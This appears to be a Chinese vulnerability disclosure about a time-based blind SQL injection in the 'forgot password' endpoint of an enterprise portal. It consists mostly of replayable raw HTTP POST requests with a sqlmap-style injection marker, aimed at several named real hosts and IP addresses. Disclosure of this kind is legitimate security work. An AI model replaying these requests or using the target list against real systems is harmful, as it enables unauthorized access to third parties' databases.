VULHUB ™

### 简要描述： ... ### 详细说明： 该系统“忘记密码”模块存在sql注入漏洞 链接地址为：/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234 [<img src="https://images.seebug.org/upload/201501/10164647850329b74ce2a803fc0de1dd767da668.png" alt="QQ图片20150110164630.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10164647850329b74ce2a803fc0de1dd767da668.png) 说明：输入用户名和邮箱后提交，程序会提交给 /epp/core（可从抓取的数据包中看到）， 漏洞参数：userid 数据库系统：oracle 注入类型：AND/OR time-based blind 这里直接给出证明案例（列出数据库实例名称即可、不深入）： 0x01; http://nc.xhlbdc.com/epp/ ``` POST /epp/core HTTP/1.1 Host: nc.xhlbdc.com Proxy-Connection: keep-alive Content-Length: 107 Origin: http://nc.xhlbdc.com Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://nc.xhlbdc.com/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438 Accept-Encoding: gzip,deflate,sdch...

### 简要描述： ... ### 详细说明： 该系统“忘记密码”模块存在sql注入漏洞 链接地址为：/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234 [<img src="https://images.seebug.org/upload/201501/10164647850329b74ce2a803fc0de1dd767da668.png" alt="QQ图片20150110164630.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10164647850329b74ce2a803fc0de1dd767da668.png) 说明：输入用户名和邮箱后提交，程序会提交给 /epp/core（可从抓取的数据包中看到）， 漏洞参数：userid 数据库系统：oracle 注入类型：AND/OR time-based blind 这里直接给出证明案例（列出数据库实例名称即可、不深入）： 0x01; http://nc.xhlbdc.com/epp/ ``` POST /epp/core HTTP/1.1 Host: nc.xhlbdc.com Proxy-Connection: keep-alive Content-Length: 107 Origin: http://nc.xhlbdc.com Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://nc.xhlbdc.com/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=8438 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=0000zdbG9i3ttIPJ7g2Ayl4KoRm:175j517sp userid=*&email=&type=forgetPWD&pageId=forgetpwd&pageUniqueId=177ef747-d34f-4076-b627-bf97720fbbdf&isAjax=1 ``` [<img src="https://images.seebug.org/upload/201501/10165621d9c4cb2ce4c8e58c932a8d0a2b7607fb.jpg" alt="QQ图片20150110165610.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10165621d9c4cb2ce4c8e58c932a8d0a2b7607fb.jpg) 0x02: http://nc.pinggugroup.com:81/epp/ ``` POST /epp/core HTTP/1.1 Host: nc.pinggugroup.com:81 Proxy-Connection: keep-alive Content-Length: 111 Origin: http://nc.pinggugroup.com:81 Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://nc.pinggugroup.com:81/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=7158 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=0000ZPRlAAMZqeOX2_DUd6dPukK:-1 userid=*&email=aaaaa&type=forgetPWD&pageId=forgetpwd&pageUniqueId=ef251f23-ae34-4047-95f0-2f95f3085cf2&isAjax=1 ``` [<img src="https://images.seebug.org/upload/201501/101651300cd5259af6212d618c309048dacc85ad.jpg" alt="QQ图片20150110165121.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/101651300cd5259af6212d618c309048dacc85ad.jpg) 0x03: http://123.232.105.202/epp/ ``` POST /epp/core HTTP/1.1 Host: 123.232.105.202 Proxy-Connection: keep-alive Content-Length: 111 Origin: http://123.232.105.202 Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://123.232.105.202/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=4522 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=0000FoJ4EiDJNB9px4Q_Y3g01j9:-1 userid=*&email=aaaaa&type=forgetPWD&pageId=forgetpwd&pageUniqueId=a4004558-4d36-4b1e-a397-6b8217320613&isAjax=1 ``` [<img src="https://images.seebug.org/upload/201501/101719046d6d5130e7343471cb3ca73c2534f71f.jpg" alt="QQ图片20150110171850.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/101719046d6d5130e7343471cb3ca73c2534f71f.jpg) 0x04: http://zfkg.com:8081/epp/ ``` POST /epp/core HTTP/1.1 Host: zfkg.com:8081 Proxy-Connection: keep-alive Content-Length: 110 Origin: http://zfkg.com:8081 Method: POST /epp/core HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: */* Referer: http://zfkg.com:8081/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234 Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,fr;q=0.4,ja;q=0.2,ko;q=0.2,ru;q=0.2,vi;q=0.2,zh-TW;q=0.2,es;q=0.2,th;q=0.2 Cookie: JSESSIONID=843FB4AB3D3B82DDDC089308B9A97A23.server; JSESSIONID=9F6DE9B77CB36498D032BE46B92A6C54.server userid=*&email=aaaa&type=forgetPWD&pageUniqueId=78c7cfa2-6909-4ee5-b72b-3098364a5369&pageId=forgetpwd&isAjax=1 ``` [<img src="https://images.seebug.org/upload/201501/10171737aa5093ace895dbdc1c9f44687ef8eb2f.jpg" alt="QQ图片20150110171723.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/10171737aa5093ace895dbdc1c9f44687ef8eb2f.jpg) http://202.136.213.21/epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234 http://61.175.97.50//epp/core/forgetpwd.jsp?pageId=forgetpwd&rand=1234 ### 漏洞证明：